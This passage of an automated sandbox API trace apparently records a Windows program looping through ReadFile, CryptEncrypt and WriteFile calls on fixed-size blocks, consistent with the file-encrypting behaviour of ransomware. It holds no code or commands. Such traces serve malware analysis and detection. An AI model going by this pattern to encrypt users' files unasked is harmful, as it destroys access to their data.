nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.113] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.113] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.113] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.113] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.113] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.113] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.113] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.113] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.113] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.113] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.113] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.113] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.113] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.113] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.114] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.114] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.114] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.114] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.114] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.114] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.114] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.114] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.114] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.114] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.114] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.114] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.114] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.115] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.115] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.115] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.115] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.115] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.115] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.115] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.115] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.115] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.115] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.115] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.115] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.115] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.115] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.116] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.116] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.116] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.116] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.116] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.116] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.116] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.116] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.116] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.116] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.116] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.116] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.116] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.117] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.117] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.117] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.117] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.117] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.117] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.117] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.117] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.117] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.117] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.117] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.117] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.117] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.117] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.118] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.118] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.118] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.118] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.118] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.118] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.118] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.118] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.118] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.118] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.118] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.118] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.119] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.119] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.119] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.119] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.119] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.119] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.119] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.119] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.119] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.119] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.119] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.119] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.119] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.120] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.120] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.120] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.120] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.120] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.120] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 